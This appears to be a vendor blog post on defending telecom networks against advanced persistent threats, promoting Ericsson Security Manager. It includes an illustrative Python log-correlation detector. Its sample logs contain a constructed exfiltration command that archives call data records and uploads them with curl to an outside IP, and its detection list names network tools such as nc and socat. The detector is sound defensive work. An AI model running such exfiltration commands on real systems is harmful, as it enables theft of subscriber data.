Securing networks against sophisticated threats – Ericsson’s approach
- Cyberattacks on telecom networks are issues of national security. Attacks in 2024 and threats in 2025 are concerns for mobile operators and the government agencies charged with protecting critical infrastructure.
- Ericsson’s approach for securing critical telecom infrastructure includes tools that enable providers to implement US DHS CISA guidance.
Telecom networks are vital to national security, and a sophisticated cyberattack on them carries significant risk. To address these concerns and enhance network protection, the US Department of Homeland Security's (DHS) Cybersecurity and Infrastructure Security Agency (CISA) has offered valuable guidance to the telecom industry that stresses best practices described in frameworks previously published by the US National Institute of Standards and Technology (NIST).
In 2024, networks faced substantial challenges due to Advanced Persistent Threats (APTs) that specifically targeted telecom networks. Looking ahead, 2025 presents renewed risks as global crises could trigger new cyberattacks on critical infrastructure. Malicious cyber activity is a real and menacing threat. Nation states sponsor APTs to develop and deploy sophisticated attack chains to reach their goals of reconnaissance, espionage, data exfiltration, unauthorized control, and/or disruption. The details of an attack change as the adversary moves laterally, switching methods and targets within the network. APTs are discussed in depth in Ericsson’s recent blog Evolving the security posture of 5G networks.
The Ericsson Security Solutions team focuses on the adversary’s tactics: the intermediate goals in the threat actor’s cyber kill chain on the way to its objectives. These tactics grow more complex as threats continuously evolve. IT cybersecurity tools can detect malware based on signature and behavioral similarities to other attacks on IT systems, but evolving APTs have moved beyond those approaches. For some time, attackers have relied on legitimate system binaries, the so-called living-off-the-land strategy. Now the attacks increasingly use a combination of unpatched vulnerabilities, valid credentials, identities and system APIs. To defend against these threats in mobile networks, one needs an in-depth understanding of the targeted mobile assets.
Two key approaches for defending against APTs are to implement industry best practices for hardening and continuous monitoring for visibility. These are accomplished in the Operations phase with an Ericsson cyber defense platform – the Ericsson Security Manager (ESM). ESM is a powerful tool to help mobile service providers operationalize security management as well as implement CISA guidance for hardening and securing against APTs [1].
ESM combines multiple data sources for visibility, enabling an actionable identify-protect-detect-response cyber defense solution:
- telecom threat intelligence
- insights of adversary objectives and tactics
- analysis of known and possible attack paths (tactics, techniques, and procedures) to reach the objectives
- in-depth know-how of mobile network solutions and especially the key data that interests the threat actors
Typically, APTs have attacked telecom systems that contain or have access to subscriber data such as call data records, IMSIs, and authentication vectors. ESM has a range of capabilities to protect and secure this data. These protective capabilities can mitigate the risk of exploitation by APTs:
- provide holistic defense against attacks on mobile network operators, based on telecom threat intelligence and focused on defending against the threat actors’ specific objectives, such as espionage.
- maintain a security-focused asset inventory that knows all the systems in the mobile network, including the special interfaces and log sources.
- protect interfaces by incorporating know-how of what secure configurations are needed to prevent or mitigate attacker success in compromising the system through the interfaces.
- protect traffic encryption by managing relevant related configurations and by providing automation of certificate management.
- collect all relevant security and audit trail logs from the systems and provide insights through automated threat detection methods and correlation capabilities specific to the system and the specific adversary objectives.
- provide sensor-based threat detection capabilities in a defense-in-depth manner.
- detect the specific tactics, techniques and procedures that attackers would use to gain access to the particular system and data they are after. This includes, for example, BPFDoor malware or specific living-off-the-land mechanisms.
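As an added illustration of the log collection and correlation described in the list above (example code, not Ericsson’s or ESM’s own), the detector below joins a valid-credential login with a subsequent living-off-the-land binary execution on an asset drawn from a hypothetical inventory of subscriber-data hosts. The audit-log format, host names, user names and the binary list are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed asset inventory: hosts holding the subscriber data an APT is after (hypothetical names).
SENSITIVE_ASSETS = {"cdr-store-01": "call data records", "hss-01": "authentication vectors"}

# Illustrative subset of system binaries commonly abused in living-off-the-land activity.
LOTL_BINARIES = {"curl", "wget", "base64", "nc", "socat", "scp", "tar", "python3"}

# Constructed audit-trail format: "<iso-timestamp> <host> LOGIN|EXEC user=<name> <detail>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<event>LOGIN|EXEC) user=(?P<user>\S+) (?P<detail>.*)$")

SAMPLE_LOGS = [  # constructed sample lines, not real operator data
    "2025-01-14T02:01:10 cdr-store-01 LOGIN user=svc_backup src=10.20.30.40",
    "2025-01-14T02:03:45 cdr-store-01 EXEC user=svc_backup /usr/bin/tar czf /tmp/.c.tgz /var/cdr",
    "2025-01-14T02:04:02 cdr-store-01 EXEC user=svc_backup /usr/bin/curl -T /tmp/.c.tgz http://203.0.113.9/up",
    "2025-01-14T02:05:00 ops-jump-01 EXEC user=admin /usr/bin/curl http://repo.internal/pkg",
    "2025-01-14T08:00:00 hss-01 LOGIN user=oper src=10.20.30.41",
    "2025-01-14T09:30:00 hss-01 EXEC user=oper /usr/bin/ls /opt",
    "2025-01-14T10:00:00 hss-01 EXEC user=oper /usr/bin/curl http://mirror.internal/x",
]

def parse_line(line):
    """Return a dict for a well-formed line, or None so malformed input is skipped rather than crashed on."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    return ev

def correlate(lines, window=timedelta(minutes=10)):
    """Flag a LotL binary run on a sensitive asset within `window` of a login by the same user there."""
    last_login = {}  # (host, user) -> timestamp of the most recent LOGIN
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["host"] not in SENSITIVE_ASSETS:
            continue  # only assets from the inventory are in scope
        key = (ev["host"], ev["user"])
        if ev["event"] == "LOGIN":
            last_login[key] = ev["ts"]
            continue
        binary = (ev["detail"].split() or [""])[0].rsplit("/", 1)[-1]  # basename of the executed path
        login_ts = last_login.get(key)
        if binary in LOTL_BINARIES and login_ts is not None and ev["ts"] - login_ts <= window:
            alerts.append({"host": ev["host"], "user": ev["user"], "binary": binary,
                           "data_at_risk": SENSITIVE_ASSETS[ev["host"]], "ts": ev["ts"]})
    return alerts
```

On the sample above only the two executions on cdr-store-01 are flagged: the jump host is outside the inventory, `ls` is not in the binary list, and the curl on hss-01 falls two hours after the login, outside the window.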
Mobile service providers, utilities and other critical infrastructure operators face increasing threats from sophisticated threat actors aiming to disrupt critical services and steal private data. Threat actors ranging from cyber criminals to nation-state-sponsored APTs are targeting mobile networks worldwide. With ESM, Ericsson offers the critical capabilities required to defend against these threat actors. Ericsson cyber defense solutions offer tools to operationalize security management in order to effectively mitigate APTs in mobile networks. Managing security configurations together with early detection of APTs prevents tactics such as initial access and lateral movement, and gives the security team time to respond before data can be exfiltrated to attacker-controlled infrastructure. With secure products and cyber defense solutions, Ericsson enables secure and resilient mobile networks based on the defendable architectures concept, with security built in.
More details about ESM can be found in Security Manager - Ericsson and in ZTA (Zero Trust Architecture) for advancing mobile network security operations.